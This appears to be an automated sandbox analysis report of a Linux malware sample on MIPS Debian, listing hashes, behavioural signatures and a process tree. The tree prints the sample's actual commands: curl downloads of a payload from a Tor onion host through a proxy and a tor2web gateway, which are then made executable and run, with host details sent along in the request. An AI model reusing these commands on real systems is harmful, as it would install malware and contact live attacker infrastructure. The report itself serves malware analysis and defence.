Analysis
- max time kernel: 124s
- max time network: 138s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240226-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 24/10/2024, 18:05

Static task: static1

Behavioral task: behavioral1
- Sample: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
- Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
- Sample: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
- Resource: debian9-armhf-20240611-en

Behavioral task: behavioral3
- Sample: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
- Resource: debian9-mipsbe-20240611-en

Behavioral task: behavioral4
- Sample: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
- Resource: debian9-mipsel-20240226-en

General
- Target: 74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
- Size: 1KB
- MD5: 74accae8c7e0093939ab4e0cd1c2a7fd
- SHA1: ae3b26988c72634e3f0daeb6486332530ba58324
- SHA256: d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
- SHA512: 7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 5 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process:
  - 720 chmod
  - 772 chmod
  - 815 chmod
  - 869 chmod
  - 876 chmod

- Executes dropped EXE (2 IoCs)
  ioc / pid / Process:
  - /tmp/i, 722, i
  - /tmp/i, 877, i

- Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc:
  - 10 checkip.amazonaws.com
  - 17 checkip.amazonaws.com
  - 24 checkip.amazonaws.com
  - 3 checkip.amazonaws.com

- Deobfuscate/Decode Files or Information (1 TTPs, 1 IoCs)
  Adversaries may deobfuscate or decode files or information to evade detection mechanisms.
  pid / Process:
  - 700 base64

- Reads runtime system information
  description / ioc / Process:
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/filesystems, crontab
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/filesystems, ls
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/filesystems, id
  - File opened for reading, /proc/filesystems, ls
  - File opened for reading, /proc/filesystems, ls
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/filesystems, crontab
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/filesystems, ls
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/filesystems, crontab
  - File opened for reading, /proc/filesystems, crontab
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl
  - File opened for reading, /proc/self/maps, awk
  - File opened for reading, /proc/sys/crypto/fips_enabled, curl

- System Network Configuration Discovery (1 TTPs, 15 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid / Process:
  - 903 curl
  - 749 curl
  - 811 curl
  - 813 curl
  - 850 ip
  - 770 curl
  - 860 curl
  - 865 curl
  - 923 curl
  - 912 ip
  - 759 ip
  - 768 curl
  - 797 curl
  - 839 curl
  - 803 ip

- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description / ioc / Process:
  - File opened for modification, /tmp/i, bash
Processes
(process tree; indentation shows parent/child depth; each entry is "image path (PID): command line", followed by the signatures that fired for it)

- /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118 (PID 696): /tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
  - /bin/bash (PID 701): bash
    signatures: Writes file to tmp directory
    - /usr/bin/cut (PID 708): cut -d: -f6
    - /usr/bin/id (PID 710): id -u
      signatures: Reads runtime system information
    - /bin/grep (PID 707): grep x:0: /etc/passwd
    - /usr/bin/head (PID 716): head -n 1 /tmp/.X11-unix/01
    - /bin/ls (PID 717): ls /proc//status
      signatures: Reads runtime system information
    - /bin/chmod (PID 720): chmod +x ./i
      signatures: File and Directory Permissions Modification
    - /tmp/i (PID 722): ./i
      signatures: Executes dropped EXE
    - /bin/rm (PID 723): rm -f i
    - /bin/grep (PID 728): grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
    - /usr/bin/tr (PID 729): tr " " "\\n"
    - /usr/bin/sort (PID 731): sort -uR
    - /usr/bin/head (PID 732): head -n 1
    - /bin/grep (PID 730): grep -Ev "[.]0"
    - /usr/bin/curl (PID 727): curl -4fsSLkA- -m200 "https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in"
      signatures: Reads runtime system information
    - /bin/uname (PID 743): uname -m
    - /bin/date (PID 745): date
    - /usr/bin/md5sum (PID 746): md5sum
    - /usr/bin/cut (PID 747): cut -f1 -d-
    - /usr/bin/curl (PID 749): curl -4fsSLk checkip.amazonaws.com
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/whoami (PID 755): whoami
    - /bin/uname (PID 756): uname -m
    - /bin/uname (PID 757): uname -n
    - /bin/grep (PID 760): grep "inet "
    - /usr/bin/md5sum (PID 762): md5sum
    - /usr/bin/awk (PID 763): awk "{print \$1}"
      signatures: Reads runtime system information
    - /sbin/ip (PID 759): ip a
      signatures: System Network Configuration Discovery
    - /usr/bin/awk (PID 761): awk "{print \$2}"
      signatures: Reads runtime system information
    - /usr/bin/crontab (PID 766): crontab -l
      signatures: Reads runtime system information
    - /usr/bin/base64 (PID 767): base64 -w0
    - /usr/bin/curl (PID 768): curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/curl (PID 770): curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /bin/chmod (PID 772): chmod +x ./3d4e2c62a0f0444c5e39a768425ab056
      signatures: File and Directory Permissions Modification
    - /tmp/3d4e2c62a0f0444c5e39a768425ab056 (PID 773): ./3d4e2c62a0f0444c5e39a768425ab056
    - /bin/rm (PID 774): rm -f ./3d4e2c62a0f0444c5e39a768425ab056
    - /usr/bin/head (PID 775): head -n 1 /tmp/.X11-unix/01
    - /bin/ls (PID 776): ls /proc//status
      signatures: Reads runtime system information
    - /bin/grep (PID 781): grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
    - /usr/bin/tr (PID 782): tr " " "\\n"
    - /usr/bin/sort (PID 784): sort -uR
    - /usr/bin/curl (PID 780): curl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"
      signatures: Reads runtime system information
    - /usr/bin/head (PID 785): head -n 1
    - /bin/grep (PID 783): grep -Ev "[.]0"
    - /bin/uname (PID 791): uname -m
    - /usr/bin/cut (PID 795): cut -f1 -d-
    - /bin/date (PID 793): date
    - /usr/bin/md5sum (PID 794): md5sum
    - /usr/bin/curl (PID 797): curl -4fsSLk checkip.amazonaws.com
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/whoami (PID 799): whoami
    - /bin/uname (PID 800): uname -m
    - /bin/uname (PID 801): uname -n
    - /sbin/ip (PID 803): ip a
      signatures: System Network Configuration Discovery
    - /bin/grep (PID 804): grep "inet "
    - /usr/bin/md5sum (PID 806): md5sum
    - /usr/bin/awk (PID 805): awk "{print \$2}"
      signatures: Reads runtime system information
    - /usr/bin/awk (PID 807): awk "{print \$1}"
      signatures: Reads runtime system information
    - /usr/bin/base64 (PID 810): base64 -w0
    - /usr/bin/crontab (PID 809): crontab -l
      signatures: Reads runtime system information
    - /usr/bin/curl (PID 811): curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/curl (PID 813): curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /bin/chmod (PID 815): chmod +x ./b18c7b90793d1614c38108eb109f833e
      signatures: File and Directory Permissions Modification
    - /tmp/b18c7b90793d1614c38108eb109f833e (PID 816): ./b18c7b90793d1614c38108eb109f833e
    - /bin/rm (PID 817): rm -f ./b18c7b90793d1614c38108eb109f833e
    - /usr/bin/head (PID 818): head -n 1 /tmp/.X11-unix/01
    - /bin/ls (PID 819): ls /proc//status
      signatures: Reads runtime system information
    - /bin/grep (PID 824): grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
    - /usr/bin/tr (PID 825): tr " " "\\n"
    - /bin/grep (PID 826): grep -Ev "[.]0"
    - /usr/bin/sort (PID 827): sort -uR
    - /usr/bin/head (PID 828): head -n 1
    - /usr/bin/curl (PID 823): curl -4fsSLkA- -m200 "https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in"
      signatures: Reads runtime system information
    - /bin/uname (PID 832): uname -m
    - /bin/date (PID 834): date
    - /usr/bin/md5sum (PID 835): md5sum
    - /usr/bin/cut (PID 836): cut -f1 -d-
    - /usr/bin/curl (PID 839): curl -4fsSLk checkip.amazonaws.com
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/whoami (PID 844): whoami
    - /bin/uname (PID 846): uname -m
    - /bin/uname (PID 847): uname -n
    - /sbin/ip (PID 850): ip a
      signatures: System Network Configuration Discovery
    - /bin/grep (PID 851): grep "inet "
    - /usr/bin/awk (PID 852): awk "{print \$2}"
      signatures: Reads runtime system information
    - /usr/bin/md5sum (PID 853): md5sum
    - /usr/bin/awk (PID 854): awk "{print \$1}"
      signatures: Reads runtime system information
    - /usr/bin/crontab (PID 857): crontab -l
      signatures: Reads runtime system information
    - /usr/bin/base64 (PID 858): base64 -w0
    - /usr/bin/curl (PID 860): curl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/curl (PID 865): curl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /bin/chmod (PID 869): chmod +x ./5f3b49ef027eb052018f97a43d59ca89
      signatures: File and Directory Permissions Modification
    - /dev/shm/5f3b49ef027eb052018f97a43d59ca89 (PID 870): ./5f3b49ef027eb052018f97a43d59ca89
    - /bin/rm (PID 871): rm -f ./5f3b49ef027eb052018f97a43d59ca89
    - /usr/bin/head (PID 873): head -n 1 /tmp/.X11-unix/01
    - /bin/ls (PID 875): ls /proc//status
      signatures: Reads runtime system information
    - /bin/chmod (PID 876): chmod +x ./i
      signatures: File and Directory Permissions Modification
    - /tmp/i (PID 877): ./i
      signatures: Executes dropped EXE
    - /bin/rm (PID 878): rm -f i
    - /bin/grep (PID 883): grep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"
    - /usr/bin/tr (PID 884): tr " " "\\n"
    - /usr/bin/curl (PID 882): curl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"
      signatures: Reads runtime system information
    - /usr/bin/head (PID 887): head -n 1
    - /usr/bin/sort (PID 886): sort -uR
    - /bin/grep (PID 885): grep -Ev "[.]0"
    - /bin/uname (PID 896): uname -m
    - /bin/date (PID 898): date
    - /usr/bin/md5sum (PID 899): md5sum
    - /usr/bin/cut (PID 900): cut -f1 -d-
    - /usr/bin/curl (PID 903): curl -4fsSLk checkip.amazonaws.com
      signatures: Reads runtime system information; System Network Configuration Discovery
    - /usr/bin/whoami (PID 907): whoami
    - /bin/uname (PID 908): uname -m
    - /bin/uname (PID 910): uname -n
    - /sbin/ip (PID 912): ip a
      signatures: System Network Configuration Discovery
    - /bin/grep (PID 913): grep "inet "
    - /usr/bin/md5sum (PID 915): md5sum
    - /usr/bin/awk (PID 914): awk "{print \$2}"
      signatures: Reads runtime system information
    - /usr/bin/awk (PID 916): awk "{print \$1}"
      signatures: Reads runtime system information
    - /usr/bin/crontab (PID 919): crontab -l
      signatures: Reads runtime system information
    - /usr/bin/base64 (PID 920): base64 -w0
    - /usr/bin/curl (PID 923): curl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_
      signatures: Reads runtime system information; System Network Configuration Discovery
  - /usr/bin/base64 (PID 700): base64 -d
    signatures: Deobfuscate/Decode Files or Information
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 5B
  MD5: f4b524261fce06c1fbd10b4681ad0b97
  SHA1: c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
  SHA256: 9577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
  SHA512: ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449